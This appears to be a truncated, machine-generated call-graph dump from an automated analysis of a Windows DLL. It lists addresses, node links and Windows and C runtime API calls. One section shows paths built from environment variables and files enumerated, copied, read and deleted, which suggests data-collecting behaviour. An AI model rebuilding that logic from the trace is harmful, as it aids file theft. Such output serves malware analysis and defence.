7257 10003505 7258 10003510 7257->7258 7259 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7257->7259 7258->7231 7259->7255 7287 10007457 7260->7287 7264 1000393f 7263->7264 7266 10003968 7264->7266 7267 100034f9 7264->7267 7277 10003be0 7264->7277 7268 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7266->7268 7267->7255 7269 100038e8 7267->7269 7268->7267 7282 10003af1 7269->7282 7272 100038fd 7272->7257 7273 10003ba2 ___vcrt_FlsSetValue 6 API calls 7274 1000390b 7273->7274 7275 10003918 7274->7275 7276 1000391b ___vcrt_uninitialize_ptd 6 API calls 7274->7276 7275->7257 7276->7272 7278 10003a82 try_get_function 5 API calls 7277->7278 7279 10003bfa 7278->7279 7280 10003c18 InitializeCriticalSectionAndSpinCount 7279->7280 7281 10003c03 7279->7281 7280->7281 7281->7264 7283 10003a82 try_get_function 5 API calls 7282->7283 7284 10003b0b 7283->7284 7285 10003b24 TlsAlloc 7284->7285 7286 100038f2 7284->7286 7286->7272 7286->7273 7290 10007470 7287->7290 7288 10002ada _ValidateLocalCookies 5 API calls 7289 100024a3 7288->7289 7289->7235 7289->7236 7290->7288 7292 100024c4 7291->7292 7293 100024c8 7291->7293 7292->7239 7294 10002639 ___scrt_fastfail 4 API calls 7293->7294 7296 100024d5 ___scrt_release_startup_lock 7293->7296 7295 10002559 7294->7295 7296->7239 6343 10008640 6346 10008657 6343->6346 6347 10008665 6346->6347 6348 10008679 6346->6348 6349 10006368 __dosmaperr 20 API calls 6347->6349 6350 10008681 6348->6350 6351 10008693 6348->6351 6353 1000866a 6349->6353 6352 10006368 __dosmaperr 20 API calls 6350->6352 6358 10008652 6351->6358 6359 100054a7 6351->6359 6354 10008686 6352->6354 6356 100062ac ___std_exception_copy 26 API calls 6353->6356 6357 100062ac ___std_exception_copy 26 API calls 6354->6357 6356->6358 6357->6358 6360 100054c4 6359->6360 6361 100054ba 6359->6361 6360->6361 6362 10005af6 _abort 38 API calls 6360->6362 6361->6358 6363 100054e5 6362->6363 6367 10007a00 6363->6367 6368 10007a13 6367->6368 6369 100054fe 6367->6369 6368->6369 6375 10007f0f 6368->6375 6371 10007a2d 6369->6371 6372 10007a40 6371->6372 6373 10007a55 6371->6373 6372->6373 6510 10006d7e 6372->6510 6373->6361 6376 10007f1b ___scrt_is_nonwritable_in_current_image 6375->6376 6377 10005af6 _abort 38 API calls 6376->6377 6378 10007f24 6377->6378 6379 10007f72 _abort 6378->6379 6387 10005671 RtlEnterCriticalSection 6378->6387 6379->6369 6381 10007f42 6388 10007f86 6381->6388 6386 100055a8 _abort 38 API calls 6386->6379 6387->6381 6389 10007f56 6388->6389 6390 10007f94 __dosmaperr 6388->6390 6392 10007f75 6389->6392 6390->6389 6395 10007cc2 6390->6395 6509 100056b9 RtlLeaveCriticalSection 6392->6509 6394 10007f69 6394->6379 6394->6386 6396 10007d42 6395->6396 6399 10007cd8 6395->6399 6397 10007d90 6396->6397 6400 1000571e _free 20 API calls 6396->6400 6463 10007e35 6397->6463 6399->6396 6401 10007d0b 6399->6401 6406 1000571e _free 20 API calls 6399->6406 6402 10007d64 6400->6402 6403 10007d2d 6401->6403 6412 1000571e _free 20 API calls 6401->6412 6404 1000571e _free 20 API calls 6402->6404 6405 1000571e _free 20 API calls 6403->6405 6407 10007d77 6404->6407 6409 10007d37 6405->6409 6411 10007d00 6406->6411 6413 1000571e _free 20 API calls 6407->6413 6408 10007d9e 6410 10007dfe 6408->6410 6422 1000571e 20 API calls _free 6408->6422 6414 1000571e _free 20 API calls 6409->6414 6415 1000571e _free 20 API calls 6410->6415 6423 100090ba 6411->6423 6417 10007d22 6412->6417 6418 10007d85 6413->6418 6414->6396 6421 10007e04 6415->6421 6451 100091b8 6417->6451 6420 1000571e _free 20 API calls 6418->6420 6420->6397 6421->6389 6422->6408 6424 100090cb 6423->6424 6450 100091b4 6423->6450 6425 100090dc 6424->6425 6426 1000571e _free 20 API calls 6424->6426 6427 100090ee 6425->6427 6428 1000571e _free 20 API calls 6425->6428 6426->6425 6429 10009100 6427->6429 6431 1000571e _free 20 API calls 6427->6431 6428->6427 6430 10009112 6429->6430 6432 1000571e _free 20 API calls 6429->6432 6433 10009124 6430->6433 6434 1000571e _free 20 API calls 6430->6434 6431->6429 6432->6430 6435 10009136 6433->6435 6436 1000571e _free 20 API calls 6433->6436 6434->6433 6437 10009148 6435->6437 6438 1000571e _free 20 API calls 6435->6438 6436->6435 6439 1000571e _free 20 API calls 6437->6439 6440 1000915a 6437->6440 6438->6437 6439->6440 6441 1000916c 6440->6441 6442 1000571e _free 20 API calls 6440->6442 6443 1000917e 6441->6443 6444 1000571e _free 20 API calls 6441->6444 6442->6441 6445 10009190 6443->6445 6447 1000571e _free 20 API calls 6443->6447 6444->6443 6446 100091a2 6445->6446 6448 1000571e _free 20 API calls 6445->6448 6449 1000571e _free 20 API calls 6446->6449 6446->6450 6447->6445 6448->6446 6449->6450 6450->6401 6452 100091c5 6451->6452 6462 1000921d 6451->6462 6453 100091d5 6452->6453 6454 1000571e _free 20 API calls 6452->6454 6455 100091e7 6453->6455 6456 1000571e _free 20 API calls 6453->6456 6454->6453 6457 1000571e _free 20 API calls 6455->6457 6458 100091f9 6455->6458 6456->6455 6457->6458 6459 1000920b 6458->6459 6460 1000571e _free 20 API calls 6458->6460 6461 1000571e _free 20 API calls 6459->6461 6459->6462 6460->6459 6461->6462 6462->6403 6464 10007e60 6463->6464 6465 10007e42 6463->6465 6464->6408 6465->6464 6469 1000925d 6465->6469 6468 1000571e _free 20 API calls 6468->6464 6470 10007e5a 6469->6470 6471 1000926e 6469->6471 6470->6468 6505 10009221 6471->6505 6474 10009221 __dosmaperr 20 API calls 6475 10009281 6474->6475 6476 10009221 __dosmaperr 20 API calls 6475->6476 6477 1000928c 6476->6477 6478 10009221 __dosmaperr 20 API calls 6477->6478 6479 10009297 6478->6479 6480 10009221 __dosmaperr 20 API calls 6479->6480 6481 100092a5 6480->6481 6482 1000571e _free 20 API calls 6481->6482 6483 100092b0 6482->6483 6484 1000571e _free 20 API calls 6483->6484 6485 100092bb 6484->6485 6486 1000571e _free 20 API calls 6485->6486 6487 100092c6 6486->6487 6488 10009221 __dosmaperr 20 API calls 6487->6488 6489 100092d4 6488->6489 6490 10009221 __dosmaperr 20 API calls 6489->6490 6491 100092e2 6490->6491 6492 10009221 __dosmaperr 20 API calls 6491->6492 6493 100092f3 6492->6493 6494 10009221 __dosmaperr 20 API calls 6493->6494 6495 10009301 6494->6495 6496 10009221 __dosmaperr 20 API calls 6495->6496 6497 1000930f 6496->6497 6498 1000571e _free 20 API calls 6497->6498 6499 1000931a 6498->6499 6500 1000571e _free 20 API calls 6499->6500 6501 10009325 6500->6501 6502 1000571e _free 20 API calls 6501->6502 6503 10009330 6502->6503 6504 1000571e _free 20 API calls 6503->6504 6504->6470 6506 10009258 6505->6506 6507 10009248 6505->6507 6506->6474 6507->6506 6508 1000571e _free 20 API calls 6507->6508 6508->6507 6509->6394 6511 10006d8a ___scrt_is_nonwritable_in_current_image 6510->6511 6512 10005af6 _abort 38 API calls 6511->6512 6517 10006d94 6512->6517 6514 10006e18 _abort 6514->6373 6516 100055a8 _abort 38 API calls 6516->6517 6517->6514 6517->6516 6518 1000571e _free 20 API calls 6517->6518 6519 10005671 RtlEnterCriticalSection 6517->6519 6520 10006e0f 6517->6520 6518->6517 6519->6517 6523 100056b9 RtlLeaveCriticalSection 6520->6523 6522 10006e16 6522->6517 6523->6522 7297 1000af43 7298 1000af59 7297->7298 7299 1000af4d 7297->7299 7299->7298 7300 1000af52 CloseHandle 7299->7300 7300->7298 7301 1000a945 7303 1000a96d 7301->7303 7302 1000a9a5 7303->7302 7304 1000a997 7303->7304 7305 1000a99e 7303->7305 7310 1000aa17 7304->7310 7314 1000aa00 7305->7314 7311 1000aa20 7310->7311 7318 1000b19b 7311->7318 7315 1000aa20 7314->7315 7316 1000b19b __startOneArgErrorHandling 21 API calls 7315->7316 7317 1000a9a3 7316->7317 7319 1000b1da __startOneArgErrorHandling 7318->7319 7324 1000b25c __startOneArgErrorHandling 7319->7324 7328 1000b59e 7319->7328 7321 1000b286 7322 1000b8b2 __startOneArgErrorHandling 20 API calls 7321->7322 7323 1000b292 7321->7323 7322->7323 7326 10002ada _ValidateLocalCookies 5 API calls 7323->7326 7324->7321 7325 100078a3 __startOneArgErrorHandling 5 API calls 7324->7325 7325->7321 7327 1000a99c 7326->7327 7329 1000b5c1 __raise_exc RaiseException 7328->7329 7330 1000b5bc 7329->7330 7330->7324 7592 1000a1c6 IsProcessorFeaturePresent 7593 10007bc7 7594 10007bd3 ___scrt_is_nonwritable_in_current_image 7593->7594 7595 10007c0a _abort 7594->7595 7601 10005671 RtlEnterCriticalSection 7594->7601 7597 10007be7 7598 10007f86 20 API calls 7597->7598 7599 10007bf7 7598->7599 7602 10007c10 7599->7602 7601->7597 7605 100056b9 RtlLeaveCriticalSection 7602->7605 7604 10007c17 7604->7595 7605->7604 7331 10005348 7332 10003529 ___vcrt_uninitialize 8 API calls 7331->7332 7333 1000534f 7332->7333 7334 10007b48 7344 10008ebf 7334->7344 7338 10007b55 7357 1000907c 7338->7357 7341 10007b7f 7342 1000571e _free 20 API calls 7341->7342 7343 10007b8a 7342->7343 7361 10008ec8 7344->7361 7346 10007b50 7347 10008fdc 7346->7347 7348 10008fe8 ___scrt_is_nonwritable_in_current_image 7347->7348 7381 10005671 RtlEnterCriticalSection 7348->7381 7350 1000905e 7395 10009073 7350->7395 7351 10008ff3 7351->7350 7353 10009032 RtlDeleteCriticalSection 7351->7353 7382 1000a09c 7351->7382 7356 1000571e _free 20 API calls 7353->7356 7354 1000906a _abort 7354->7338 7356->7351 7358 10007b64 RtlDeleteCriticalSection 7357->7358 7359 10009092 7357->7359 7358->7338 7358->7341 7359->7358 7360 1000571e _free 20 API calls 7359->7360 7360->7358 7362 10008ed4 ___scrt_is_nonwritable_in_current_image 7361->7362 7371 10005671 RtlEnterCriticalSection 7362->7371 7364 10008f77 7376 10008f97 7364->7376 7368 10008f83 _abort 7368->7346 7369 10008e78 30 API calls 7370 10008ee3 7369->7370 7370->7364 7370->7369 7372 10007b94 RtlEnterCriticalSection 7370->7372 7373 10008f6d 7370->7373 7371->7370 7372->7370 7379 10007ba8 RtlLeaveCriticalSection 7373->7379 7375 10008f75 7375->7370 7380 100056b9 RtlLeaveCriticalSection 7376->7380 7378 10008f9e 7378->7368 7379->7375 7380->7378 7381->7351 7383 1000a0a8 ___scrt_is_nonwritable_in_current_image 7382->7383 7384 1000a0b9 7383->7384 7385 1000a0ce 7383->7385 7386 10006368 __dosmaperr 20 API calls 7384->7386 7394 1000a0c9 _abort 7385->7394 7398 10007b94 RtlEnterCriticalSection 7385->7398 7388 1000a0be 7386->7388 7390 100062ac ___std_exception_copy 26 API calls 7388->7390 7389 1000a0ea 7399 1000a026 7389->7399 7390->7394 7392 1000a0f5 7415 1000a112 7392->7415 7394->7351 7490 100056b9 RtlLeaveCriticalSection 7395->7490 7397 1000907a 7397->7354 7398->7389 7400 1000a033 7399->7400 7401 1000a048 7399->7401 7402 10006368 __dosmaperr 20 API calls 7400->7402 7407 1000a043 7401->7407 7418 10008e12 7401->7418 7403 1000a038 7402->7403 7405 100062ac ___std_exception_copy 26 API calls 7403->7405 7405->7407 7407->7392 7408 1000907c 20 API calls 7409 1000a064 7408->7409 7424 10007a5a 7409->7424 7411 1000a06a 7431 1000adce 7411->7431 7414 1000571e _free 20 API calls 7414->7407 7489 10007ba8 RtlLeaveCriticalSection 7415->7489 7417 1000a11a 7417->7394 7419 10008e26 7418->7419 7420 10008e2a 7418->7420 7419->7408 7420->7419 7421 10007a5a 26 API calls 7420->7421 7422 10008e4a 7421->7422 7446 10009a22 7422->7446 7425 10007a66 7424->7425 7426 10007a7b 7424->7426 7427 10006368 __dosmaperr 20 API calls 7425->7427 7426->7411 7428 10007a6b 7427->7428 7429 100062ac ___std_exception_copy 26 API calls 7428->7429 7430 10007a76 7429->7430 7430->7411 7432 1000adf2 7431->7432 7433 1000addd 7431->7433 7434 1000ae2d 7432->7434 7438 1000ae19 7432->7438 7435 10006355 __dosmaperr 20 API calls 7433->7435 7436 10006355 __dosmaperr 20 API calls 7434->7436 7437 1000ade2 7435->7437 7439 1000ae32 7436->7439 7440 10006368 __dosmaperr 20 API calls 7437->7440 7473 1000ada6 7438->7473 7442 10006368 __dosmaperr 20 API calls 7439->7442 7443 1000a070 7440->7443 7444 1000ae3a 7442->7444 7443->7407 7443->7414 7445 100062ac ___std_exception_copy 26 API calls 7444->7445 7445->7443 7447 10009a2e ___scrt_is_nonwritable_in_current_image 7446->7447 7448 10009a36 7447->7448 7449 10009a4e 7447->7449 7450 10006355 __dosmaperr 20 API calls 7448->7450 7451 10009aec 7449->7451 7454 10009a83 7449->7454 7452 10009a3b 7450->7452 7453 10006355 __dosmaperr 20 API calls 7451->7453 7456 10006368 __dosmaperr 20 API calls 7452->7456 7455 10009af1 7453->7455 7468 10008c7b RtlEnterCriticalSection 7454->7468 7458 10006368 __dosmaperr 20 API calls 7455->7458 7463 10009a43 _abort 7456->7463 7460 10009af9 7458->7460 7459 10009a89 7462 10006368 __dosmaperr 20 API calls 7459->7462 7466 10009ab5 7459->7466 7461 100062ac ___std_exception_copy 26 API calls 7460->7461 7461->7463 7464 10009aaa 7462->7464 7463->7419 7465 10006355 __dosmaperr 20 API calls 7464->7465 7465->7466 7469 10009ae4 7466->7469 7468->7459 7472 10008c9e RtlLeaveCriticalSection 7469->7472 7471 10009aea 7471->7463 7472->7471 7476 1000ad24 7473->7476 7475 1000adca 7475->7443 7477 1000ad30 ___scrt_is_nonwritable_in_current_image 7476->7477 7484 10008c7b RtlEnterCriticalSection 7477->7484 7479 1000ad3e 7480 1000ad65 7479->7480 7481 10006368 __dosmaperr 20 API calls 7479->7481 7485 1000ad9a 7480->7485 7481->7480 7483 1000ad8d _abort 7483->7475 7484->7479 7488 10008c9e RtlLeaveCriticalSection 7485->7488 7487 1000ada4 7487->7483 7488->7487 7489->7417 7490->7397 6524 10002049 6525 10002055 ___scrt_is_nonwritable_in_current_image 6524->6525 6526 100020d3 6525->6526 6527 1000207d 6525->6527 6537 1000205e 6525->6537 6559 10002639 IsProcessorFeaturePresent 6526->6559 6538 1000244c 6527->6538 6530 100020da 6531 10002082 6547 10002308 6531->6547 6533 10002087 __RTC_Initialize 6550 100020c4 6533->6550 6535 1000209f 6553 1000260b 6535->6553 6539 10002451 ___scrt_release_startup_lock 6538->6539 6540 10002455 6539->6540 6543 10002461 6539->6543 6541 1000527a _abort 20 API calls 6540->6541 6542 1000245f 6541->6542 6542->6531 6544 1000246e 6543->6544 6545 1000499b _abort 28 API calls 6543->6545 6544->6531 6546 10004bbd 6545->6546 6546->6531 6563 100034c7 RtlInterlockedFlushSList 6547->6563 6549 10002312 6549->6533 6565 1000246f 6550->6565 6552 100020c9 ___scrt_release_startup_lock 6552->6535 6554 10002617 6553->6554 6555 1000262d 6554->6555 6606 100053ed 6554->6606 6555->6537 6560 1000264e ___scrt_fastfail 6559->6560 6561 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6560->6561 6562 10002744 ___scrt_fastfail 6561->6562 6562->6530 6564 100034d7 6563->6564 6564->6549 6570 100053ff 6565->6570 6577 10005c2b 6570->6577 6573 1000391b 6574 1000354d 6573->6574 6575 10003925 6573->6575 6574->6552 6588 10003b2c 6575->6588 6578 10002476 6577->6578 6579 10005c35 6577->6579 6578->6573 6581 10005db2 6579->6581 6582 10005c45 __dosmaperr 5 API calls 6581->6582 6583 10005dd9 6582->6583 6584 10005df1 TlsFree 6583->6584 6585 10005de5 6583->6585 6584->6585 6586 10002ada _ValidateLocalCookies 5 API calls 6585->6586 6587 10005e02 6586->6587 6587->6578 6593 10003a82 6588->6593 6590 10003b46 6591 10003b5e TlsFree 6590->6591 6592 10003b52 6590->6592 6591->6592 6592->6574 6594 10003aaa 6593->6594 6598 10003aa6 __crt_fast_encode_pointer 6593->6598 6594->6598 6599 100039be 6594->6599 6597 10003ac4 GetProcAddress 6597->6598 6598->6590 6604 100039cd try_get_first_available_module 6599->6604 6600 100039ea LoadLibraryExW 6601 10003a05 GetLastError 6600->6601 6600->6604 6601->6604 6602 10003a60 FreeLibrary 6602->6604 6603 10003a77 6603->6597 6603->6598 6604->6600 6604->6602 6604->6603 6605 10003a38 LoadLibraryExW 6604->6605 6605->6604 6617 100074da 6606->6617 6609 10003529 6610 10003532 6609->6610 6611 10003543 6609->6611 6612 1000391b ___vcrt_uninitialize_ptd 6 API calls 6610->6612 6611->6555 6613 10003537 6612->6613 6621 10003972 6613->6621 6620 100074f3 6617->6620 6618 10002ada _ValidateLocalCookies 5 API calls 6619 10002625 6618->6619 6619->6609 6620->6618 6622 1000353c 6621->6622 6623 1000397d 6621->6623 6625 10003c50 6622->6625 6624 10003987 RtlDeleteCriticalSection 6623->6624 6624->6622 6624->6624 6626 10003c59 6625->6626 6628 10003c7f 6625->6628 6627 10003c69 FreeLibrary 6626->6627 6626->6628 6627->6626 6628->6611 7606 10009bcd 7607 10009bd0 7606->7607 7608 10009bd7 7607->7608 7609 10009bf9 7607->7609 7610 10009ccd 7608->7610 7627 10009645 7608->7627 7615 10009bef 7609->7615 7632 10009492 GetConsoleCP 7609->7632 7613 10006368 __dosmaperr 20 API calls 7610->7613 7614 10009cc0 7610->7614 7616 10009cf2 7613->7616 7621 10002ada _ValidateLocalCookies 5 API calls 7614->7621 7615->7610 7615->7614 7617 10009ca9 7615->7617 7618 10006355 __dosmaperr 20 API calls 7616->7618 7619 10009cb0 7617->7619 7620 10009cc4 7617->7620 7618->7614 7623 10006368 __dosmaperr 20 API calls 7619->7623 7622 10006332 __dosmaperr 20 API calls 7620->7622 7624 10009d15 7621->7624 7622->7614 7625 10009cb5 7623->7625 7626 10006355 __dosmaperr 20 API calls 7625->7626 7626->7614 7630 1000969f 7627->7630 7631 1000966a 7627->7631 7628 100096a1 GetLastError 7628->7630 7629 1000a181 WriteConsoleW CreateFileW 7629->7631 7630->7615 7631->7628 7631->7629 7631->7630 7636 100094f5 __fassign 7632->7636 7641 10009607 7632->7641 7633 10002ada _ValidateLocalCookies 5 API calls 7634 10009641 7633->7634 7634->7615 7637 1000957b WideCharToMultiByte 7636->7637 7640 100095d2 WriteFile 7636->7640 7636->7641 7642 10007c19 7636->7642 7638 100095a1 WriteFile 7637->7638 7637->7641 7638->7636 7639 1000962a GetLastError 7638->7639 7639->7641 7640->7636 7640->7639 7641->7633 7643 10005af6 _abort 38 API calls 7642->7643 7644 10007c24 7643->7644 7645 10007a00 38 API calls 7644->7645 7646 10007c34 7645->7646 7646->7636 6629 1000724e GetProcessHeap 6630 1000284f 6631 10002882 std::exception::exception 27 API calls 6630->6631 6632 1000285d 6631->6632 6969 100036d0 6970 100036e2 6969->6970 6972 100036f0 @_EH4_CallFilterFunc@8 6969->6972 6971 10002ada _ValidateLocalCookies 5 API calls 6970->6971 6971->6972 7491 10005351 7492 10005360 7491->7492 7496 10005374 7491->7496 7494 1000571e _free 20 API calls 7492->7494 7492->7496 7493 1000571e _free 20 API calls 7495 10005386 7493->7495 7494->7496 7497 1000571e _free 20 API calls 7495->7497 7496->7493 7498 10005399 7497->7498 7499 1000571e _free 20 API calls 7498->7499 7500 100053aa 7499->7500 7501 1000571e _free 20 API calls 7500->7501 7502 100053bb 7501->7502 7503 10008d52 7504 10008d74 7503->7504 7505 10008d5f 7503->7505 7508 10006355 __dosmaperr 20 API calls 7504->7508 7510 10008d99 7504->7510 7506 10006355 __dosmaperr 20 API calls 7505->7506 7507 10008d64 7506->7507 7509 10006368 __dosmaperr 20 API calls 7507->7509 7511 10008da4 7508->7511 7512 10008d6c 7509->7512 7513 10006368 __dosmaperr 20 API calls 7511->7513 7514 10008dac 7513->7514 7515 100062ac ___std_exception_copy 26 API calls 7514->7515 7515->7512 6973 100066d5 6974 100066e1 6973->6974 6975 100066f2 6974->6975 6976 100066eb FindClose 6974->6976 6977 10002ada _ValidateLocalCookies 5 API calls 6975->6977 6976->6975 6978 10006701 6977->6978 7647 100073d5 7648 100073e1 ___scrt_is_nonwritable_in_current_image 7647->7648 7657 10005671 RtlEnterCriticalSection 7648->7657 7650 100073e8 7656 10007406 7650->7656 7658 10007269 GetStartupInfoW 7650->7658 7654 10007417 _abort 7667 10007422 7656->7667 7657->7650 7659 10007286 7658->7659 7660 10007318 7658->7660 7659->7660 7661 100072dd GetFileType 7659->7661 7662 1000731f 7660->7662 7661->7659 7664 10007326 7662->7664 7663 10007369 GetStdHandle 7663->7664 7664->7663 7665 100073d1 7664->7665 7666 1000737c GetFileType 7664->7666 7665->7656 7666->7664 7670 100056b9 RtlLeaveCriticalSection 7667->7670 7669 10007429 7669->7654 7670->7669 6979 10004ed7 6980 10006d60 51 API calls 6979->6980 6981 10004ee9 6980->6981 6990 10007153 GetEnvironmentStringsW 6981->6990 6984 10004ef4 6986 1000571e _free 20 API calls 6984->6986 6987 10004f29 6986->6987 6988 10004eff 6989 1000571e _free 20 API calls 6988->6989 6989->6984 6991 1000716a 6990->6991 7001 100071bd 6990->7001 6994 10007170 WideCharToMultiByte 6991->6994 6992 100071c6 FreeEnvironmentStringsW 6993 10004eee 6992->6993 6993->6984 7002 10004f2f 6993->7002 6995 1000718c 6994->6995 6994->7001 6996 100056d0 21 API calls 6995->6996 6997 10007192 6996->6997 6998 100071af 6997->6998 6999 10007199 WideCharToMultiByte 6997->6999 7000 1000571e _free 20 API calls 6998->7000 6999->6998 7000->7001 7001->6992 7001->6993 7003 10004f44 7002->7003 7004 1000637b __dosmaperr 20 API calls 7003->7004 7013 10004f6b 7004->7013 7005 10004fcf 7006 1000571e _free 20 API calls 7005->7006 7007 10004fe9 7006->7007 7007->6988 7008 1000637b __dosmaperr 20 API calls 7008->7013 7009 10004fd1 7011 10005000 20 API calls 7009->7011 7010 1000544d ___std_exception_copy 26 API calls 7010->7013 7012 10004fd7 7011->7012 7015 1000571e _free 20 API calls 7012->7015 7013->7005 7013->7008 7013->7009 7013->7010 7014 10004ff3 7013->7014 7017 1000571e _free 20 API calls 7013->7017 7016 100062bc ___std_exception_copy 11 API calls 7014->7016 7015->7005 7018 10004fff 7016->7018 7017->7013 6633 1000ae59 6634 1000ae5f 6633->6634 6639 10008cc1 6634->6639 6637 1000aedd 6638 10006332 __dosmaperr 20 API calls 6638->6637 6640 10008cd0 6639->6640 6641 10008d37 6639->6641 6640->6641 6647 10008cfa 6640->6647 6642 10006368 __dosmaperr 20 API calls 6641->6642 6643 10008d3c 6642->6643 6644 10006355 __dosmaperr 20 API calls 6643->6644 6645 10008d27 6644->6645 6645->6637 6645->6638 6646 10008d21 SetStdHandle 6646->6645 6647->6645 6647->6646 5795 10001c5b 5796 10001c6b ___scrt_fastfail 5795->5796 5799 100012ee 5796->5799 5798 10001c87 5800 10001324 ___scrt_fastfail 5799->5800 5801 100013b7 GetEnvironmentVariableW 5800->5801 5825 100010f1 5801->5825 5804 100010f1 57 API calls 5805 10001465 5804->5805 5806 100010f1 57 API calls 5805->5806 5807 10001479 5806->5807 5808 100010f1 57 API calls 5807->5808 5809 1000148d 5808->5809 5810 100010f1 57 API calls 5809->5810 5811 100014a1 5810->5811 5812 100010f1 57 API calls 5811->5812 5813 100014b5 lstrlenW 5812->5813 5814 100014d2 5813->5814 5815 100014d9 lstrlenW 5813->5815 5814->5798 5816 100010f1 57 API calls 5815->5816 5817 10001501 lstrlenW lstrcatW 5816->5817 5818 100010f1 57 API calls 5817->5818 5819 10001539 lstrlenW lstrcatW 5818->5819 5820 100010f1 57 API calls 5819->5820 5821 1000156b lstrlenW lstrcatW 5820->5821 5822 100010f1 57 API calls 5821->5822 5823 1000159d lstrlenW lstrcatW 5822->5823 5824 100010f1 57 API calls 5823->5824 5824->5814 5826 10001118 ___scrt_fastfail 5825->5826 5827 10001129 lstrlenW 5826->5827 5838 10002c40 5827->5838 5830 10001177 lstrlenW FindFirstFileW 5832 100011a0 5830->5832 5833 100011e1 5830->5833 5831 10001168 lstrlenW 5831->5830 5834 100011c7 FindNextFileW 5832->5834 5835 100011aa 5832->5835 5833->5804 5834->5832 5837 100011da FindClose 5834->5837 5835->5834 5840 10001000 5835->5840 5837->5833 5839 10001148 lstrcatW lstrlenW 5838->5839 5839->5830 5839->5831 5841 10001022 ___scrt_fastfail 5840->5841 5842 100010af 5841->5842 5843 1000102f lstrcatW lstrlenW 5841->5843 5846 100010b5 lstrlenW 5842->5846 5856 100010ad 5842->5856 5844 1000105a lstrlenW 5843->5844 5845 1000106b lstrlenW 5843->5845 5844->5845 5857 10001e89 lstrlenW 5845->5857 5871 10001e16 5846->5871 5849 10001088 GetFileAttributesW 5852 1000109c 5849->5852 5849->5856 5850 100010ca 5851 10001e89 5 API calls 5850->5851 5850->5856 5853 100010df 5851->5853 5852->5856 5863 1000173a 5852->5863 5876 100011ea 5853->5876 5856->5835 5858 10002c40 ___scrt_fastfail 5857->5858 5859 10001ea7 lstrcatW lstrlenW 5858->5859 5860 10001ed1 lstrcatW 5859->5860 5861 10001ec2 5859->5861 5860->5849 5861->5860 5862 10001ec7 lstrlenW 5861->5862 5862->5860 5864 10001747 ___scrt_fastfail 5863->5864 5891 10001cca 5864->5891 5867 1000199f 5867->5856 5869 10001824 ___scrt_fastfail _strlen 5869->5867 5911 100015da 5869->5911 5872 10001e29 5871->5872 5875 10001e4c 5871->5875 5873 10001e2d lstrlenW 5872->5873 5872->5875 5874 10001e3f lstrlenW 5873->5874 5873->5875 5874->5875 5875->5850 5877 1000120e ___scrt_fastfail 5876->5877 5878 10001e89 5 API calls 5877->5878 5879 10001220 GetFileAttributesW 5878->5879 5880 10001235 5879->5880 5881 10001246 5879->5881 5880->5881 5884 1000173a 35 API calls 5880->5884 5882 10001e89 5 API calls 5881->5882 5883 10001258 5882->5883 5885 100010f1 56 API calls 5883->5885 5884->5881 5886 1000126d 5885->5886 5887 10001e89 5 API calls 5886->5887 5888 1000127f ___scrt_fastfail 5887->5888 5889 100010f1 56 API calls 5888->5889 5890 100012e6 5889->5890 5890->5856 5892 10001cf1 ___scrt_fastfail 5891->5892 5893 10001d0f CopyFileW CreateFileW 5892->5893 5894 10001d44 DeleteFileW 5893->5894 5895 10001d55 GetFileSize 5893->5895 5900 10001808 5894->5900 5896 10001ede 22 API calls 5895->5896 5897 10001d66 ReadFile 5896->5897 5898 10001d94 CloseHandle DeleteFileW 5897->5898 5899 10001d7d CloseHandle DeleteFileW 5897->5899 5898->5900 5899->5900 5900->5867 5901 10001ede 5900->5901 5903 1000222f 5901->5903 5904 1000224e 5903->5904 5907 10002250 5903->5907 5919 1000474f 5903->5919 5924 100047e5 5903->5924 5904->5869 5906 10002908 5908 100035d2 __CxxThrowException@8 RaiseException 5906->5908 5907->5906 5931 100035d2 5907->5931 5910 10002925 5908->5910 5910->5869 5912 1000160c _strcat _strlen 5911->5912 5913 1000163c lstrlenW 5912->5913 6019 10001c9d 5913->6019 5915 10001655 lstrcatW lstrlenW 5916 10001678 5915->5916 5917 10001693 ___scrt_fastfail 5916->5917 5918 1000167e lstrcatW 5916->5918 5917->5869 5918->5917 5934 10004793 5919->5934 5921 10004765 5940 10002ada 5921->5940 5923 1000478f 5923->5903 5929 100056d0 __dosmaperr 5924->5929 5925 1000570e 5953 10006368 5925->5953 5927 100056f9 RtlAllocateHeap 5928 1000570c 5927->5928 5927->5929 5928->5903 5929->5925 5929->5927 5930 1000474f __dosmaperr 7 API calls 5929->5930 5930->5929 5933 100035f2 RaiseException 5931->5933 5933->5906 5935 1000479f ___scrt_is_nonwritable_in_current_image 5934->5935 5947 10005671 RtlEnterCriticalSection 5935->5947 5937 100047aa 5948 100047dc 5937->5948 5939 100047d1 _abort 5939->5921 5941 10002ae3 5940->5941 5942 10002ae5 IsProcessorFeaturePresent 5940->5942 5941->5923 5944 10002b58 5942->5944 5952 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5944->5952 5946 10002c3b 5946->5923 5947->5937 5951 100056b9 RtlLeaveCriticalSection 5948->5951 5950 100047e3 5950->5939 5951->5950 5952->5946 5956 10005b7a GetLastError 5953->5956 5957 10005b93 5956->5957 5958 10005b99 5956->5958 5975 10005e08 5957->5975 5963 10005bf0 SetLastError 5958->5963 5982 1000637b 5958->5982 5962 10005bb3 5989 1000571e 5962->5989 5964 10005bf9 5963->5964 5964->5928 5968 10005bb9 5970 10005be7 SetLastError 5968->5970 5969 10005bcf 6002 1000593c 5969->6002 5970->5964 5973 1000571e _free 17 API calls 5974 10005be0 5973->5974 5974->5963 5974->5970 6007 10005c45 5975->6007 5977 10005e2f 5978 10005e47 TlsGetValue 5977->5978 5980 10005e3b 5977->5980 5978->5980 5979 10002ada _ValidateLocalCookies 5 API calls 5981 10005e58 5979->5981 5980->5979 5981->5958 5988 10006388 __dosmaperr 5982->5988 5983 100063c8 5985 10006368 __dosmaperr 19 API calls 5983->5985 5984 100063b3 RtlAllocateHeap 5986 10005bab 5984->5986 5984->5988 5985->5986 5986->5962 5995 10005e5e 5986->5995 5987 1000474f __dosmaperr 7 API calls 5987->5988 5988->5983 5988->5984 5988->5987 5990 10005752 __dosmaperr 5989->5990 5991 10005729 HeapFree 5989->5991 5990->5968 5991->5990 5992 1000573e 5991->5992 5993 10006368 __dosmaperr 18 API calls 5992->5993 5994 10005744 GetLastError 5993->5994 5994->5990 5996 10005c45 __dosmaperr 5 API calls 5995->5996 5997 10005e85 5996->5997 5998 10005ea0 TlsSetValue 5997->5998 5999 10005e94 5997->5999 5998->5999 6000 